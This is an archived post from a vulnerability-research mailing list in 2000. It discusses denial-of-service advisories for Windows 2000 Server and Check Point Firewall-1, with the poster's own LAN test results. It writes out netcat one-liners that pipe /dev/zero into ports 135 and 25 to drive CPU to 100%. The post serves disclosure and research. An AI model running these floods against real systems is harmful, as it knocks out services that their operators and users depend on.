|
Vulnerability Development
mailing list archives
Win2k and /dev/zero
From: pete () S3 INTEGRALIS CO UK (Pete Philips)
Date: Mon, 3 Jul 2000 11:11:22 +0100
Anyone played with this yet?
SecureXpert Labs Advisory [SX-20000620-2] - Multiple ports/protocols
partial Denial of Service in Microsoft Windows 2000 Server
Summary
Multiple ports and protocols on Microsoft Windows 2000 Server are susceptible
to a simple network attack which raises CPU utilization on Windows 2000
Server to 100%.
My initial results (tested locally on a LAN) are:
Using:
% nc -u <host> 135 < /dev/zero
Results:
Win2k = 100% CPU for duration of attack
NT4 = 55% CPU for duration
NT4 + MS00-029
patch = No effect
The effect of the Jolt2 patch and tcpdump output indicate that
this is a fragmentation attack variation. My tests yielded multiple
fragments of the form:
20780:1480 () various (Frag ID:size () offset)
Anyone tried the Firewall-1 variation?
SecureXpert Labs Advisory [SX-20000620-3] - Partial Denial of
Service in Check Point Firewall-1 on Windows NT
Sending a stream of binary zeros over the network to the SMTP port on the firewall
raises the target system's load to 100% while the load on the attacker's
system machine remains relatively low. This can easily be reproduced from
a Linux system using netcat with an input of /dev/zero, with a command such as
"nc firewall 25 < /dev/zero".
Pete.
---------------------------------------------------------------
| Pete Philips \|/ |
| Integralis S3 Team O |
| E-mail: pete.philips () integralis co uk |
| Phone: +44 118 930 6060 |
| PGP Key: http://www.s3.integralis.co.uk/pgp/pete.pgp |
---------------------------------------------------------------
 By Date 
By Thread
Current thread:
- Win2k and /dev/zero Pete Philips (Jul 03)
| 
Intro
